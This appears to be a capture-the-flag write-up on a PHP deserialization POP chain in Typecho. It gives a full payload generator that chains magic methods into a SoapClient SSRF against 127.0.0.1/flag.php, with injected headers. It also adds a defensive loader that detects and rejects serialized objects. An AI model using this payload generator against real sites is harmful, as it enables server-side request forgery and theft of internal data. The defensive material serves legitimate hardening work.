This is a slightly longer POP chain construction.
It builds an SSRF against 127.0.0.1
by abusing the SoapClient class.
The script is as follows:
<?php

// Step 1: HelloWorld_DB is the class that gets unserialized; its __wakeup starts the chain
class HelloWorld_DB{
    private $coincidence;
    function __construct(){
        $this->coincidence = ['hello' => new Typecho_Db_Query()];
    }

    function __wakeup(){
        $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
    }
}

# 2. Typecho_Db is instantiated with the Typecho_Db_Query object as $adapterName
class Typecho_Db
{
    public function __construct($adapterName, $prefix = 'typecho_')
    {
        $this->_adapterName = $adapterName;

        # the string concatenation here triggers __toString on the Typecho_Db_Query object
        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;

        $this->_prefix = $prefix;

        $this->_adapter = new $adapterName();
    }
}

# 3. __toString in Typecho_Db_Query calls a method on $_adapter; since $_adapter is a
#    SoapClient, SoapClient::__call fires the HTTP request to $target
class Typecho_Db_Query
{
    private $_sqlPreBuild;
    private $_adapter;

    public function __construct()
    {
        $target = 'http://127.0.0.1/flag.php';
        $headers = array(
            'X-Forwarded-For: 127.0.0.1',
            'Cookie: PHPSESSID=mz12345678'
        );
        $b = new SoapClient(
            null,
            array(
                'location' => $target,
                'user_agent' => "xxxx " . join(" ", $headers),
                'uri' => "xxx"
            )
        );
        $this->_sqlPreBuild = array("action" => "SELECT");
        $this->_adapter = $b;
    }
}

// generate the payload (the classes above are only stubs for serialization)
$a = new HelloWorld_DB();
$aa = serialize($a);
var_dump($aa);
var_dump(base64_encode($aa));

?>
Some writeups mention that %00 has to be converted to \0 and s to S, but that is actually unnecessary, since nothing is filtered after decoding.
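The whole chain only works because unserialize() is allowed to instantiate arbitrary classes (HelloWorld_DB, then the SoapClient stored inside it) and to run their magic methods. The example below is added here and is not part of the original writeup or of Typecho: it shows a deserialization entry point that refuses object payloads up front and, as a second layer, calls unserialize() with allowed_classes => false so that any object that does slip through becomes __PHP_Incomplete_Class and no __wakeup, __toString or __call ever runs. The function names, the cookie format and the sample payloads are assumptions constructed for the demonstration; allowed_classes requires PHP 7.0 or later.

```php
<?php
// Added example, not code from the writeup or the Typecho project.
// Function names and payload shapes below are hypothetical / constructed.

// Coarse detection: list the class names a serialized payload would instantiate.
// Serialized objects look like O:<len>:"<ClassName>":<n>:{...}
function classes_in_payload(string $serialized): array {
    preg_match_all('/O:\d+:"([^"]+)"/', $serialized, $m);
    return array_values(array_unique($m[1]));
}

// Hardened loader for a base64-encoded serialized cookie/parameter.
// Layer 1: the data is supposed to be a plain array, so any object is rejected and logged.
// Layer 2: unserialize() runs with allowed_classes => false, so even an object that
//          bypassed layer 1 becomes __PHP_Incomplete_Class and its magic methods never run.
function load_state_safely(string $b64): ?array {
    $raw = base64_decode($b64, true);
    if ($raw === false) {
        return null;
    }
    $classes = classes_in_payload($raw);
    if ($classes !== []) {
        error_log('rejected serialized payload referencing classes: ' . implode(', ', $classes));
        return null;
    }
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

// Constructed payload in the shape the generator above produces: an outer
// HelloWorld_DB object whose private $coincidence holds a Typecho_Db_Query.
$attack = base64_encode(
    'O:13:"HelloWorld_DB":1:{s:26:"' . "\0HelloWorld_DB\0coincidence" .
    '";a:1:{s:5:"hello";O:16:"Typecho_Db_Query":0:{}}}'
);
var_dump(load_state_safely($attack));   // NULL, and the class names are logged

// A benign payload (plain array) is still accepted.
$benign = base64_encode(serialize(['theme' => 'dark', 'page' => 2]));
var_dump(load_state_safely($benign));   // array with 'theme' and 'page'
```

Rejecting objects outright is the right choice whenever the application only ever stores scalars and arrays; where real objects are needed, pass an explicit whitelist to allowed_classes instead of false, and keep classes with network-capable magic methods such as SoapClient off that list. Logging the class names found in rejected payloads also gives the SOC a concrete signal for attempts like the one in this writeup.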
over.